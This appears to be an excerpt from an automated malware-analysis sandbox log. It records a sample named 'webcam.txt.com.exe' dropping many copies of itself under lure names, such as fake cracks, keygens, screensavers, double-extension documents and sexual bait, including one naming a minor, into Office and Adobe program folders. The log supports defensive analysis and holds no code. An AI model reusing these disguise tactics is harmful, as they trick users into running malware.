Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Help\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Full album.mp3.pifJump to dropped file
Source: unknownExecutable created and started: C:\Windows\winlogon.exe
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Clone DVD 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Clone DVD 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\ACDSee 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Cracks & Warez Archive.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\RFC Basics Full Edition.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Windows Sourcecode.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Microsoft Office 2003 Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\1000 Sex and more.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\WinXP eBook.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Serials.txt.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\MS Service Pack 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Magix Video Deluxe 4.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Learn Programming.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Ahead Nero 7.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Gimp 1.5 Full with Key.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Learn Programming.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Learn Programming.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Star Office 8.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Windows Sourcecode.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Ulead Keygen.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\3D Studio Max 3dsmax.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Cracks & Warez Archive.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Doom 3 Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Clone DVD 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Gimp 1.5 Full with Key.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Norton Antivirus 2004.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Visual Studio Net Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Ahead Nero 7.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Visual Studio Net Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Ahead Nero 7.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Learn Programming.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Adobe Photoshop 9 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\The Sims 3 crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\XXX hardcore pic.jpg.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Magix Video Deluxe 4.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Magix Video Deluxe 4.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Win Longhorn Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Ulead Keygen.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\IE58.1 full setup.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Ahead Nero 7.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\DivX 7.0 final.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Cracks & Warez Archive.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Win Longhorn Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Smashing the stack.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\IE58.1 full setup.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Clone DVD 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Adobe Photoshop 9 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\1000 Sex and more.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\How to hack.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\XXX hardcore pic.jpg.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Windows Sourcecode.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\3D Studio Max 3dsmax.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Help\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Teen Porn 16.jpg.pifJump to dropped file
